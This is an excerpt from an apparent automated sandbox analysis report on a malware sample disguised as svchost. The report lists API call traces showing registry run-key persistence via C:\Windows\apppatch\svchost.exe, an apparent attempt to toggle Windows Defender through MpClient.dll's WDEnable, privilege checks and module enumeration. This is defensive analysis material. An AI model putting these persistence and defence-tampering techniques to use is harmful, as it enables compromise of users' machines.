                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce6421b2d2444c25b49b855bd033f18d0e3627447580b0992b8399903382df4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2631F7726003616BE210AA65B84CBABB798DFD575CF444529F849C2341FB70CC5CCAB2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040253C
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025A0
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025C3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025D8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004025E4
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004025FF
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040260E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040261A
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402629
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402635
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402644
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402647
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                • API String ID: 606440919-2829233815
                                                                                                                                                                                                                • Opcode ID: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
                                                                                                                                                                                                                • Instruction ID: 03c6ffd3b6dc1066bd99cfbbbb98c4e24752acf73b2e09b6b1ad6d20697dc7f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB312A716842187EF311EB90DD9AFEA7768EB89B00F104155F304AA1D0DBF1AA45CBE9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401FD6
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401FF0
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 00401FFF
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00402039
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 0040205A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 0040207C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 00402088
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 00402096
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 1233480013-2375045364
                                                                                                                                                                                                                • Opcode ID: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
                                                                                                                                                                                                                • Instruction ID: 8973f4922baf9af671f2a19144e2d86d5cf9878df638c7e503d434612b68899c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F721EB7190131477D7109BA5AE4DB9F77A8ABC8310F100276EB04F32D1DB789E41C669
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D452F6
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45307
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D45310
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 02D4531F
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45328
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D45348
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D45359
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 02D4537A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 02D4539C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 02D453A8
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 02D453B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: e1335d24abad6c7ed869de408a0381fa1276d590ea4d3de9ffcec7f2d8d0f696
                                                                                                                                                                                                                • Instruction ID: 3b6bad80c533e0beb586039b8d6e7d2683d72f2268798658887c27d7ef19dfb0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1335d24abad6c7ed869de408a0381fa1276d590ea4d3de9ffcec7f2d8d0f696
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C421D872D01214ABD710ABA9BC4CBAE77A8EB49328FD40295E985D3380EF74DD55CB70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,74DEF550,00000000,76EEC3F0), ref: 02D44465
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D4447C
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D4449A
                                                                                                                                                                                                                • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444B2
                                                                                                                                                                                                                • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444D8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000), ref: 02D4450B
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 02D4451C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D4452E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4453F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
                                                                                                                                                                                                                • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                                • API String ID: 4044281766-3691563785
                                                                                                                                                                                                                • Opcode ID: f927dba83340a9d06c3b651012c03e66279bddb45fb3a64ff12847bf5b8b9f35
                                                                                                                                                                                                                • Instruction ID: 4c32a6fc499dd7f0edb9a6324abe034e22e4045a0c5dab0149cafbeba81f505a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f927dba83340a9d06c3b651012c03e66279bddb45fb3a64ff12847bf5b8b9f35
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA318671D042486FDF10CBA4D84CBAE7BB8BF44315F844498E64667381DBB49D85CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040267F
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026AD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004026C0
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026D2
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E60,00000000,00004401,00404E70,?), ref: 004026FB
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E80,00000000,00004401,00404E90,?), ref: 004027AF
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00402BFA), ref: 0040283D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402844
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0040289E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                • String ID: Windows Explorer
                                                                                                                                                                                                                • API String ID: 1140695583-228612681
                                                                                                                                                                                                                • Opcode ID: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
                                                                                                                                                                                                                • Instruction ID: bcca5549e6a36079ff93457438ec30656b046552e7bb8440c472f06e22bdaec7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C714175A006059FCB10EB98CD84DAFB7B9AF88704B248266E904FB3D0D7B5ED42CB54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D44C33
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02D44C42
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D44C49
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D44C61
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C78
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02D44C7E
                                                                                                                                                                                                                  • Part of subcall function 02D33D90: GetProcessHeap.KERNEL32(00000008,02D44CA7,00000000,75A934D0,?,?,02D44C94,00000104,?,?,?,?,00000000), ref: 02D33DAE
                                                                                                                                                                                                                  • Part of subcall function 02D33D90: HeapAlloc.KERNEL32(00000000,?,?,02D44C94,00000104,?,?,?,?,00000000), ref: 02D33DB5
                                                                                                                                                                                                                  • Part of subcall function 02D33D90: memset.MSVCRT ref: 02D33DC5
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C9F
                                                                                                                                                                                                                • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000), ref: 02D44CC6
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000), ref: 02D44CDA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02D44C10
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                                • API String ID: 2345603349-374730529
                                                                                                                                                                                                                • Opcode ID: 3dbc60956455f08f1de06cd064ee13f0b58d0b5809f4995016b5ff08cee6a576
                                                                                                                                                                                                                • Instruction ID: e1601822aaff670370b604e3416fd79108b99e60611507528a332f09beaa6ce5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dbc60956455f08f1de06cd064ee13f0b58d0b5809f4995016b5ff08cee6a576
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421F775900105ABD711DA649D48FBBB7A9AB84701F280459E545A7340EF759FC1CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004020FE
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402114
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040212A
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 00402137
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402146
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040215B
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040218C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                • String ID: MpClient.dll$WDEnable$Windows Defender
                                                                                                                                                                                                                • API String ID: 1010965793-3061216624
                                                                                                                                                                                                                • Opcode ID: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
                                                                                                                                                                                                                • Instruction ID: 17fe50366fb736dd5c610a74938a74168bdb82ca3e71c76a348591a6388f5d5b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8411D5B5900315BBC7209FA49D89FAABB7CEB48710F10027AFB05B61C0C2784E058AA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D34A6F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D34A72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D34A7F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D34A82
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D34A9A
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D34A9D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D34AAA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D34AAD
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02D34AC3
                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 02D34ACD
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02D34AD7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 278890334-0
                                                                                                                                                                                                                • Opcode ID: 1aabe74d3e9c6b3f8e3ce471273aec29542a98a09fb6df0ecf1d2663cc7e9706
                                                                                                                                                                                                                • Instruction ID: 025b93f59c3564c05b4a94dbd74bf3d8a7f647d605d2ea881d8cb84784af5440
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aabe74d3e9c6b3f8e3ce471273aec29542a98a09fb6df0ecf1d2663cc7e9706
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F921C031A09268AADB259BB5EC4CF9F7BACEF45319F040868F549D7240CA74DC90DBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26772
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26790
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000000,00000104,?,?,?,?,?,74DF0F10), ref: 02D267A9
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,?,?,74DF0F10), ref: 02D2681D
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104,?,?,?,?,?,74DF0F10), ref: 02D26843
                                                                                                                                                                                                                • RegDeleteValueA.KERNEL32(?,A1633BD9a,?,?,?,?,?,74DF0F10), ref: 02D26854
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,74DF0F10), ref: 02D26863
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Valuememset$CloseDeleteOpenlstrcpyn
                                                                                                                                                                                                                • String ID: A1633BD9a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2098141307-1581879137
                                                                                                                                                                                                                • Opcode ID: 3f7bfdb3c1343e1ca1b351d7ac6e2081e320d966271cc0244e506edbb326bf06
                                                                                                                                                                                                                • Instruction ID: 2468eec380ea5b66979ecb55a7b46df3d309d8a3d501c09ff71b4c9e8c20d7d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7bfdb3c1343e1ca1b351d7ac6e2081e320d966271cc0244e506edbb326bf06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F31EAB1944318ABEB14DB64DCCDFED77ACEB14308F5044A9E545D3241D674DEC88BA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D332C8
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02D368E7), ref: 02D332FF
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,A1633F95a,00000000,02D368E7,00000000,?,?,02D368E7), ref: 02D3331C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,02D368E7), ref: 02D33326
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02D368E7), ref: 02D33359
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,A1633F95a,00000000,?,00000000,02D368E7,?,02D368E7), ref: 02D33376
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,02D368E7), ref: 02D33380
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: A1633F95a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-1894910394
                                                                                                                                                                                                                • Opcode ID: f31e9773d253f055a3a547c0d7decd4ef92fb781adc2bd59d274c65532b44580
                                                                                                                                                                                                                • Instruction ID: b0a2cde69ce10ff15793f0a71b9e0bb70e9a3dd7e3fb1e25ddb9c8dc581e9e2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f31e9773d253f055a3a547c0d7decd4ef92fb781adc2bd59d274c65532b44580
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C212175E40209FBEB00DBA4DD59FEEBBB8EF48704F504559E501E6240EBB4AA44CB94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D455EF
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02D45628
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D45693
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D456F6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                                • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$5E8DC0EB$A1633F41a
                                                                                                                                                                                                                • API String ID: 2823094833-349683712
                                                                                                                                                                                                                • Opcode ID: bdfeadda5906fa9629a1d421fe7510be42d85b9e62f65ac7e6f3e0b0b088a2c3
                                                                                                                                                                                                                • Instruction ID: 02e11e0e7737fa079a95fe3ee47d84ea8461817a78106cd6e3f2aae0702b80d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdfeadda5906fa9629a1d421fe7510be42d85b9e62f65ac7e6f3e0b0b088a2c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88413B71A00149EFD714CF68AD88BEEF7AAEFA4304F9541A4D548AB380DBB16E45C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D235CC
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D235E6
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 02D235F5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseExistsFileOpenPathQueryValue
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3861587275-2273877672
                                                                                                                                                                                                                • Opcode ID: 2a7dd7176932ba39b2a9f64f9deaec00ad7d82407ddfbc21c353d7877b648804
                                                                                                                                                                                                                • Instruction ID: 1488ffb6cf180b6620d6f7a66d17583f21f443616e31b195aa9bbf500830ef8b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a7dd7176932ba39b2a9f64f9deaec00ad7d82407ddfbc21c353d7877b648804
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9014E30B4434CABFB14C670ED47FED3329EF54B08F5005A8E54AA2700E6B49E888B70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D235CC
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D235E6
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 02D235F5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
